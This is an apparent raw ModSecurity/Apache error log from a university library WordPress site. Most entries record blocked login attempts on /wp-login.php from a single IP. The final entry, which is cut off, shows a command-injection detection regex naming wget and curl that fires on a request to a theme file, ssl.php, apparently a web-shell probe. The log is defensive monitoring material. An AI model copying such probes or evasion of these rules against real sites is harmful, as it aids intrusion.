[Mon Aug 28 21:47:46.795598 2023] [:error] [pid 53091] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyzksCo-f0AAM9j680AAAAU"]
[Mon Aug 28 21:49:46.428660 2023] [:error] [pid 53050] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy0CsCo-f0AAM86y1wAAAAA"]
[Mon Aug 28 21:52:01.546972 2023] [:error] [pid 53098] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy0kcCo-f0AAM9qaAQAAAAS"]
[Mon Aug 28 21:54:13.367494 2023] [:error] [pid 53149] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy1FcCo-f0AAM@dkjMAAAAA"]
[Mon Aug 28 21:56:25.946203 2023] [:error] [pid 53092] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy1mcCo-f0AAM9k@ioAAAAV"]
[Mon Aug 28 21:58:42.014509 2023] [:error] [pid 53153] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy2IsCo-f0AAM@hD9EAAAAL"]
[Mon Aug 28 22:00:57.539852 2023] [:error] [pid 53136] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy2qcCo-f0AAM@Qc-IAAAAD"]
[Mon Aug 28 22:03:14.433479 2023] [:error] [pid 53257] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy3MsCo-f0AANAJgHoAAAAE"]
[Mon Aug 28 22:05:30.532944 2023] [:error] [pid 53319] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy3usCo-f0AANBHWTMAAAAP"]
[Mon Aug 28 22:07:43.291057 2023] [:error] [pid 53335] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy4P8Co-f0AANBXq-4AAAAZ"]
[Mon Aug 28 22:09:56.601533 2023] [:error] [pid 53248] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy4xMCo-f0AANAAAfUAAAAB"]
[Mon Aug 28 22:12:11.406843 2023] [:error] [pid 53327] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy5S8Co-f0AANBP39cAAAAW"]
[Mon Aug 28 22:14:27.042396 2023] [:error] [pid 53473] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy508Co-f0AANDhHVgAAAAQ"]
[Mon Aug 28 22:16:42.415205 2023] [:error] [pid 53318] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy6WsCo-f0AANBG2HMAAAAO"]
[Mon Aug 28 22:18:57.941466 2023] [:error] [pid 53262] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy64cCo-f0AANAOfn0AAAAC"]
[Mon Aug 28 22:21:16.517704 2023] [:error] [pid 53537] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy7bMCo-f0AANEh50AAAAAH"]
[Mon Aug 28 22:23:43.965396 2023] [:error] [pid 53509] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy7-8Co-f0AANEF@-QAAAAM"]
[Mon Aug 28 22:26:10.401645 2023] [:error] [pid 53583] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy8ksCo-f0AANFPpUsAAAAT"]
[Mon Aug 28 22:28:28.517451 2023] [:error] [pid 53584] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy9HMCo-f0AANFQ0dsAAAAH"]
[Mon Aug 28 22:30:46.216513 2023] [:error] [pid 53670] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy9psCo-f0AANGmjjgAAAAD"]
[Mon Aug 28 22:33:04.467253 2023] [:error] [pid 53631] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy@MMCo-f0AANF-ynAAAAAB"]
[Mon Aug 28 22:35:25.571450 2023] [:error] [pid 53675] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy@vcCo-f0AANGrj9kAAAAW"]
[Mon Aug 28 22:37:46.114698 2023] [:error] [pid 53798] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy-SsCo-f0AANImqHoAAAAA"]
[Mon Aug 28 22:40:06.827295 2023] [:error] [pid 53872] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOy-1sCo-f0AANJwQSwAAAAG"]
[Mon Aug 28 22:42:28.734699 2023] [:error] [pid 53679] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzAZMCo-f0AANGvOCEAAAAH"]
[Mon Aug 28 22:44:48.952790 2023] [:error] [pid 53913] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzA8MCo-f0AANKZk8AAAAAL"]
[Mon Aug 28 22:47:12.566868 2023] [:error] [pid 53964] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzBgMCo-f0AANLMZdEAAAAU"]
[Mon Aug 28 22:49:35.191091 2023] [:error] [pid 53969] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzCD8Co-f0AANLR2gMAAAAN"]
[Mon Aug 28 22:51:58.336763 2023] [:error] [pid 53968] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzCnsCo-f0AANLQQCYAAAAK"]
[Mon Aug 28 22:54:25.990212 2023] [:error] [pid 54010] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzDMcCo-f0AANL6ST8AAAAS"]
[Mon Aug 28 22:56:51.288253 2023] [:error] [pid 53956] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzDw8Co-f0AANLEhH4AAAAO"]
[Mon Aug 28 22:59:16.306992 2023] [:error] [pid 54069] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzEVMCo-f0AANM1YdYAAAAA"]
[Mon Aug 28 23:01:41.431484 2023] [:error] [pid 54174] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzE5cCo-f0AANOeGX0AAAAl"]
[Mon Aug 28 23:04:07.667367 2023] [:error] [pid 54194] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzFd8Co-f0AANOyvRkAAAAB"]
[Mon Aug 28 23:06:34.171255 2023] [:error] [pid 54225] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzGCsCo-f0AANPRy4IAAAAh"]
[Mon Aug 28 23:08:59.448585 2023] [:error] [pid 54295] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzGm8Co-f0AANQXOj8AAAAi"]
[Mon Aug 28 23:11:26.952069 2023] [:error] [pid 54430] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzHLsCo-f0AANSeCHAAAAAC"]
[Mon Aug 28 23:13:56.652395 2023] [:error] [pid 54098] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzHxMCo-f0AANNSjlMAAAAF"]
[Mon Aug 28 23:15:01.828446 2023] [:error] [pid 54277] [client 23.106.249.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:s_wget. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: Wget found within REQUEST_COOKIES:s_wget: GNU+Wget+1.15+built+on+linux-gnu."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/themes/twentytwentyone/ssl.php"] [unique_id 